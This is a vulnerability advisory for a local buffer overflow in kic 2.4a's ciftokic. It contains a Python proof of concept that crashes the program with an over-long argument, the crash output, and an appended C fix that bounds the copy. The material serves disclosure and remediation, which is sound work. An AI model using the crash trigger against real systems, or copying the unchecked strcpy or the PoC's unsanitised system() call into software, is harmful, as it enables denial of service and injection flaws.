kic 2.4a Denial Of Service

2019.10.02
Credit: JosueEncinar
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Ciftokic 2.4a - DoS Buffer Overflow
# Date: September 30, 2019
# Exploit Author: @JosueEncinar
# Software Link: http://launchpad.net/ubuntu/+source/kic/2.4a-1
# Version: 2.4a
# Tested on: Ubuntu 18.04

'''
Line 52 of ciftokic.c declares the buffer:

    char CIFFile[81], *Tmp;

The problem is on line 84, which copies the first argument into it without a length check:

    strcpy(CIFFile,argv[1]);

If the first argument is 80 characters or less, nothing happens, but with 81 characters or more the program fails with a buffer overflow.
'''

# To test the code use Python 3.6+

from os import system
from sys import argv

def print_usage():
    print("Usage: python3 ciftokic_overflow.py <characters_numbers>")
    print(" |_No Buffer Overflow: python3 ciftokic_overflow.py 80")
    print(" |_Buffer Overflow: python3 ciftokic_overflow.py 81")

if len(argv) == 1:
    print_usage()
else:
    try:
        # Length of the first argument passed to ciftokic
        number = int(argv[1])
        payload = "J"*number
        system(f"ciftokic {payload}")
    except ValueError:
        # Non-numeric length given on the command line
        print_usage()

"""
Output Example:

josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 80
Error: can't read CIF input file JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ

josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 81
*** buffer overflow detected ***: ciftokic terminated
Aborted (core dumped)
"""
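For the fix side of the strcpy(CIFFile,argv[1]) call described above, here is a bounded copy that rejects an over-long file name instead of writing past the 81-byte buffer. This is an added example, not code from the kic package or from the advisory's author; copy_cif_name, try_length and CIF_NAME_MAX are hypothetical names, and the 'J' inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

#define CIF_NAME_MAX 81   /* size of CIFFile in ciftokic.c, per the advisory */

/* Pattern reported in the advisory (unbounded copy of argv[1]):
 *     char CIFFile[81], *Tmp;
 *     strcpy(CIFFile, argv[1]);
 */

/* Hypothetical helper: copy src into dst only if it fits with its NUL.
 * Returns 0 on success, -1 if src is NULL or too long (dst is left empty). */
int copy_cif_name(char *dst, size_t dstsz, const char *src)
{
    size_t len;

    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    len = strlen(src);        /* argv strings are NUL-terminated */
    if (len >= dstsz)         /* no room for the terminator: reject */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed demo input: a file name made of n 'J' characters. */
int try_length(size_t n)
{
    char arg[256];
    char CIFFile[CIF_NAME_MAX];

    if (n >= sizeof arg)
        return -1;
    memset(arg, 'J', n);
    arg[n] = '\0';
    return copy_cif_name(CIFFile, sizeof CIFFile, arg);
}

int main(void)
{
    printf("80 chars -> %d\n", try_length(80));
    printf("81 chars -> %d\n", try_length(81));
    return 0;
}
```

A caller would print an error and exit when the helper returns -1, so the boundary the advisory identifies (80 accepted, 81 rejected) becomes a handled error rather than an abort.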

